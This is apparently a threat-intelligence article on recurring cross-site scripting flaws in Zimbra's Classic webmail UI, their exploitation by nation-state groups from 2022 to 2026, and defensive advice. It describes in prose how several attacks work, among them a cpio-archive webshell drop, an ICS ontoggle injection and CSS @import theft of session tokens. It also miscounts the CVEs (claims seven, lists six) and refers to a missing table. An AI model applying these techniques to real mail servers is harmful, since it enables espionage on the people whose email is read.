Zimbra's Persistent XSS Problem: Nation-State Actors and the Classic UI (2022–2026)

Email as Intelligence Infrastructure

Government officials and diplomats use email for everything: internal policy coordination, treaty negotiations, personnel matters, and intelligence assessments. Their inboxes are archives of sensitive decisions made over months and years. A foreign intelligence service does not need to compromise a classified network to collect strategically valuable information — it needs access to the webmail platform.

This is the logic behind the sustained targeting of Zimbra Collaboration Suite. Zimbra is an open-source enterprise email and collaboration platform used by government agencies, military organisations, and diplomatic missions globally. It is particularly prevalent in Eastern European government infrastructure, the Global South, and organisations with tight licensing budgets — making it a recurring fixture in nation-state intelligence collection campaigns.

Since 2022, seven Zimbra cross-site scripting CVEs have reached the CISA Known Exploited Vulnerabilities catalog, all rooted in the same architectural component: the Classic UI HTML rendering engine. Nation-state actors linked to Greece, Belarus, Russia, Vietnam, and Pakistan have each exploited these vulnerabilities — sometimes as zero-days, sometimes against servers that had been patched for months. The recurring vulnerability, the recurring target profile, and the recurring exploitation pattern form one of the clearest illustrations of how a persistent architectural weakness becomes a standing intelligence-collection tool.

What is Zimbra Collaboration Suite?

Zimbra Collaboration Suite (ZCS) is an enterprise email, calendar, and collaboration platform. Organizations deploy it as an on-premises server or hosted service; Zimbra provides the webmail interface, SMTP/IMAP backend, shared calendar, and contacts functionality that users access through their browser.

The relevant architectural division is between two UI modes:

Classic UI is the original Zimbra web client, written in DHTML. It renders email bodies and calendar data in the browser, processing HTML content from incoming messages to display it to the user. The Classic UI is the dominant mode in government and older enterprise deployments — it is the default in many Zimbra configurations.

Modern UI (Iris) is a React-based rewrite introduced in ZCS 8.8. It uses a different rendering pipeline and has a distinct set of vulnerabilities.

Every XSS CVE in this cluster targets the Classic UI. When an attacker exploits these vulnerabilities, they inject JavaScript that executes in the context of the victim's authenticated webmail session — giving them the ability to steal session tokens, read all email, exfiltrate contacts and calendar data, and send email as the victim. The attack is typically zero-click from the victim's perspective: the malicious email arrives in their inbox, and the script executes when they open or preview the message. No phishing prompt, no attachment to open, no link to click.

The Zimbra KEV Cluster: An Overview

Zimbra has accumulated nineteen CVEs in the CISA KEV catalog spanning 2018 to 2026. The cluster divides into two meaningful sub-categories:

Remote code execution and authentication bypass — CVEs like CVE-2022-37042, CVE-2022-41352, and CVE-2024-45519 (CVSS 10.0) that enable an unauthenticated attacker to execute commands directly on the server. These vulnerabilities are operationally high-impact and tend to trigger mass exploitation campaigns.

Classic UI XSS — CVE-2022-24682, CVE-2023-37580, CVE-2024-27443, CVE-2025-27915, CVE-2025-48700, and CVE-2025-66376: a family of stored and reflected cross-site scripting vulnerabilities all rooted in how the Classic UI sanitizes and renders HTML from email bodies and calendar data. These CVSS Medium ratings — typically 5.4 to 6.1 — consistently understate their intelligence value. CVSS models individual vulnerabilities in isolation. It does not model the strategic value of the email inbox as an intelligence target.

The XSS sub-cluster is the subject of this article.

The Pattern, Year by Year

2022 — The First XSS and the Mass Exploitation Baseline

CVE-2022-24682 established the pattern. Added to the CISA KEV catalog in February 2022, it is a stored XSS in the Calendar feature of Zimbra's Classic UI. CISA's ransomware flag on this CVE is notable — it indicates the vulnerability was exploited not only for intelligence collection but also as an initial access vector in ransomware campaigns, confirming that Zimbra exploitation spans the full threat actor spectrum.

The same year produced the most technically severe Zimbra exploitation documented in the KEV catalog. CVE-2022-37042 and CVE-2022-41352 form a two-CVE chain that achieves unauthenticated remote code execution without any user interaction.

CVE-2022-41352 exploits a loophole in how Zimbra's antivirus component — amavis — processes email attachments. When amavis receives an email containing a cpio archive, it extracts the archive's contents for scanning. Zimbra's extraction path is /opt/zimbra/jetty/webapps/zimbra/public — which is also the Zimbra web root, directly accessible via HTTP. An attacker emails a crafted cpio archive containing a JSP webshell; amavis extracts it to the web root; the attacker immediately accesses the webshell over HTTP without ever authenticating to the Zimbra interface. CVE-2022-37042 is the authentication bypass that removed the one access hurdle that the mboximport upload endpoint had previously required — making the full chain work even on configurations where direct cpio upload would have required credentials.

Volexity documented mass exploitation of this chain against more than 1,000 ZCS instances globally in October 2022, making it one of the largest confirmed Zimbra mass-exploitation events on record.

The two sub-clusters — XSS for intelligence collection, RCE for direct compromise — ran simultaneously in 2022, establishing Zimbra as a dual-use target: email platform for intelligence access, server for persistent footholds.

2023 — Google TAG Catches Four Nation-State Groups in a Single Zero-Day

CVE-2023-37580 is the best-documented case of Zimbra XSS as a nation-state tool. Google's Threat Analysis Group (TAG) attributed exploitation of this reflected XSS vulnerability to four distinct nation-state actors over a ten-week window — each operating independently, with separate targeting packages.

The timeline reveals the sophistication of the campaign:

• June 29, 2023 — A group linked to Greece began exploitation before Zimbra publicly disclosed the vulnerability — a confirmed zero-day window. Targeting focused on Greek government officials' webmail accounts.
• July 2023 — Winter Vivern (also tracked as UAC-0114, attributed to Belarusian intelligence) began exploiting the same zero-day, targeting government webmail accounts in Moldova and Tunisia.
• July 20, 2023 — A group with Vietnam-nexus indicators began exploitation.
• August 25, 2023 — A group with Pakistan-nexus indicators began exploitation. This was after the official patch release on July 25 — demonstrating that the attacking group either obtained the PoC from the patch diff analysis or observed the earlier actors' techniques and adapted them after the fact.

CISA added CVE-2023-37580 to the KEV catalog on July 27, 2023 — two days after the official Zimbra patch release on July 25 — acting on exploitation evidence accumulated across the preceding four weeks of active zero-day abuse.

The Google TAG finding — four separate intelligence operations exploiting a single webmail XSS zero-day, against government targets across three continents, in parallel — illustrates precisely why email platforms warrant disproportionate defender attention relative to their CVSS scores. The vulnerability itself is rated 6.1. The intelligence yield from access to a government official's inbox for weeks or months is incalculable.

2024 — ICS Calendar Injection and the CVSS 10.0 Command Execution

CVE-2024-27443 continued the pattern into 2024, introducing a new injection vector: ICS calendar files. Calendar invitations in the iCalendar (.ics) format are processed by Zimbra and rendered in the browser through the same Classic UI pipeline as email HTML. CVE-2024-27443 exploits insufficient sanitization of content within ICS file fields — allowing an attacker to embed malicious HTML that executes when the recipient opens or previews the calendar invitation in the Classic UI. The attack surface expands beyond email bodies: any message type that passes through the Classic UI rendering engine, including calendar data from external sources, becomes a potential injection point.

The same year produced the most severe Zimbra vulnerability in recent years: CVE-2024-45519, a CVSS 10.0 unauthenticated command execution vulnerability in the postjournal service. Unlike the XSS cluster, CVE-2024-45519 requires no user interaction and no established session — an attacker sends a crafted network request to the postjournal service and achieves operating-system-level command execution with no credentials. The fact that Zimbra reached CVSS 10.0 for server-side command execution within the same product line that is simultaneously being exploited for client-side intelligence collection illustrates the breadth of the attack surface: nation-state actors harvesting email sessions and opportunistic attackers deploying webshells and ransomware are hitting different entry points of the same platform simultaneously.

2025–2026 — CSS @import Becomes the New Attack Vector

The three most recent Zimbra XSS CVEs in the catalog — CVE-2025-27915, CVE-2025-48700, and CVE-2025-66376 — share a technical theme: attackers found that CSS injection bypasses sanitization checks that were specifically written to block JavaScript.

CVE-2025-27915 exploits HTML tag injection within ICS calendar data. An attacker crafts a calendar invitation containing a <details> HTML element with an ontoggle event handler. When the Classic UI renders the invitation and the user interacts with it (or when the browser auto-triggers the event during rendering), the JavaScript payload executes. Security firm attribution linked confirmed exploitation of CVE-2025-27915 to UNC1151/Ghostwriter — a Belarusian intelligence-linked threat group previously associated with information operations campaigns — targeting Brazilian military and government email accounts. UNC1151's pivot from European government targets (CVE-2023-37580 Moldova/Tunisia) to Brazilian military accounts reflects an expanding operational mandate.

CVE-2025-66376 and CVE-2025-48700 represent the CSS @import generation of Zimbra XSS exploitation. Both vulnerabilities exploit the same mechanism: the Classic UI's HTML sanitizer correctly strips <script> tags and inline JavaScript event handlers, but allows <style> blocks containing CSS. An attacker constructs an email whose HTML body includes a CSS @import directive pointing to an attacker-controlled external stylesheet. When the Classic UI renders the email, the browser fetches and applies the external stylesheet — which can itself contain CSS url() directives that exfiltrate the authenticated session's CSRF token (stolen from the page's DOM or localStorage) as URL parameters to an attacker-controlled server.

CVE-2025-66376 was exploited in what researchers dubbed Operation GhostMail, attributed to APT28 (Fancy Bear — Russian GRU military intelligence). The campaign targeted Ukrainian government and military email accounts. APT28's implementation concealed the @import directive inside a <div style="display:none"> element to reduce visibility in email previews. The CSRF token exfiltration used both DNS and HTTPS channels, providing redundancy in restricted network environments. The Finnish National Cyber Security Centre (NCSC-FI) discovered and reported the campaign; CISA added CVE-2025-66376 to the KEV catalog on March 18, 2026.

CVE-2025-48700 uses the same @import mechanism and was added to CISA's KEV catalog in April 2026 with a three-day remediation deadline — reflecting CISA's assessment of active exploitation urgency. The juxtaposition of CVE-2025-66376 (Russian intelligence targeting Ukraine) and CVE-2025-48700 (separate actors, separate KEV addition) within weeks of each other indicates that the @import bypass technique had been discovered and operationalised by multiple threat actors simultaneously — consistent with either independent discovery or technique sharing.

Why the HTML Sanitizer Keeps Failing

Seven XSS CVEs across four years, each requiring a new patch, suggests not a series of discrete bugs but a structural difficulty in the sanitization problem itself.

HTML is a context-sensitive parsing problem. A browser's HTML parser is designed to be maximally forgiving — it will construct a valid DOM from almost any malformed input. A sanitizer, by contrast, must anticipate every context in which an attacker could inject executable code, including contexts the sanitizer authors did not model when writing the allowlists. Every HTML attribute that accepts a URL is a potential JavaScript vector (href="javascript:...", src="data:text/html,...", action="..."). Every CSS property that triggers a network request is a potential exfiltration channel (background-image: url(...), @import).

Multiple injection surfaces with different processing pipelines. Email HTML bodies, ICS calendar fields, and HTML-formatted contact notes all flow through different code paths before reaching the Classic UI renderer. Each processing pipeline has its own sanitization logic, and each has independently failed. CVE-2022-24682 hit email HTML; CVE-2024-27443 and CVE-2025-27915 hit ICS calendar data; CVE-2025-48700 and CVE-2025-66376 hit email HTML again with a different bypass technique. Patching one path does not guarantee the others are correct.

CSS was not treated as executable. The <style> block and inline CSS that triggered CVE-2025-66376 and CVE-2025-48700 were being permitted because CSS appears to be presentation-only. But CSS @import and url() directives cause the browser to make external network requests — which means an attacker controlling an external server can receive the user's session token as a URL parameter. Allowing arbitrary CSS in email HTML creates a side-channel even when JavaScript is fully blocked.

The Classic UI's age. The Classic UI codebase is over fifteen years old and predates modern sanitization frameworks like DOMPurify. Its sanitization logic has been extended piecemeal rather than rebuilt from a principled allowlist model, accumulating bypass opportunities as the HTML specification expanded.

Who Is Attacking

Confirmed and attributed threat actors across the Zimbra KEV cluster:

Two observations about this table stand out. First, the same Classic UI has been independently exploited by intelligence services from at least five countries across four years — each finding or adopting the same technique for the same reason: government email is the target. Second, the Belarus attribution appears twice (Winter Vivern in CVE-2023-37580, UNC1151 in CVE-2025-27915), suggesting that Belarusian intelligence services have maintained sustained operational interest in Zimbra as an intelligence collection platform.

What Defenders Must Do

The XSS vulnerabilities in this cluster are not individually catastrophic in the way that a CVSS 10.0 command execution is. They are precisely targeted, low-noise attacks that produce high-value intelligence access with minimal forensic footprint. Defending against them requires a different posture than defending against mass exploitation events.

1. Patch immediately, with a short SLA. Every XSS in this cluster required a victim to open a malicious email in the Classic UI — but that is the normal operation of a webmail platform. There is no behavioral detection that distinguishes a legitimate email open from a malicious one; the only mitigation is preventing the exploit from running. Treat Zimbra XSS patches as equivalent priority to authentication bypass patches. Apply within 24–48 hours of release for any internet-accessible instance.

2. Verify the Zimbra Antimalware Platform version is current. Zimbra's update cycle for ZCS patches is separate from OS-level patching. Confirm that the installed ZCS version includes the current security patch bundle via the Zimbra administration console or zmcontrol status. Organizations using Zimbra Network Edition should verify patch availability with their vendor; open-source community editions require manual package updates.

3. Restrict CSS rendering in the Classic UI if operationally possible. Some Zimbra configurations allow administrators to restrict the HTML features rendered in the Classic UI. Disabling or restricting <style> block and inline CSS processing in email rendering eliminates the @import attack vector documented in CVE-2025-48700 and CVE-2025-66376 — at the cost of email formatting fidelity.

4. Migrate high-value users to the Modern UI (Iris). All confirmed XSS exploitation in this cluster targets the Classic UI. Zimbra's Modern UI (Iris) uses a different rendering pipeline and has not appeared in this CVE cluster. For government users, diplomatic staff, and executives whose email archives are high-intelligence-value targets, the Modern UI represents a meaningful attack surface reduction. Classic UI can be disabled per-user or per-domain in ZCS configuration.

5. Restrict ICS calendar invitation processing from external senders. CVE-2024-27443 and CVE-2025-27915 exploited calendar invitation injection. Organizations that do not require external senders to place items directly on internal calendars should consider disabling automatic calendar invite processing from non-domain senders, or routing external invitations through a separate review step.

6. Monitor for anomalous authenticated webmail activity following suspicious email receipt. XSS session theft does not generate failed authentication events — the attacker inherits a valid session. Look for authenticated API calls to unusual endpoints, bulk email access via webmail API (suggesting mass archiving), or contact-export operations immediately following receipt of email from external senders. Email gateways should log the receipt of messages containing <style> blocks with CSS @import directives pointing to external domains.

7. Do not expose Zimbra Admin Console (port 7071) to the internet. Several Zimbra critical CVEs (including the postjournal chain) require or benefit from access to management-plane services. Restrict all administrative interfaces to VPN-only access from administrator networks. Zimbra webmail (port 443) and SMTP/IMAP (ports 25, 587, 993) should be treated as the only externally accessible services.

The Structural Problem

The Zimbra XSS cluster is not a series of independent bugs discovered by different researchers over four years. It is a single recurring failure: a legacy HTML rendering engine that cannot reliably distinguish attacker-controlled HTML from legitimate email formatting, in a product deployed by exactly the organisations that foreign intelligence services most want to surveil.

The CVSS scores — 5.4 to 6.1 across the XSS cluster — reflect the vulnerability's individual technical properties. They do not reflect the strategic value of the target population, the zero-click delivery mechanism, the low forensic footprint, or the compounding effect of access to months of archived government correspondence. Nation-state actors have consistently assessed this vulnerability class as worth sustained investment, returning to the same attack surface across four years with progressively refined bypass techniques.

Defenders serving government organisations, diplomatic missions, or any institution whose email carries sensitive operational data should treat Zimbra XSS patches as critical regardless of their CVSS score, and should regard Classic UI exposure to the public internet as a standing intelligence risk — not a conditional one.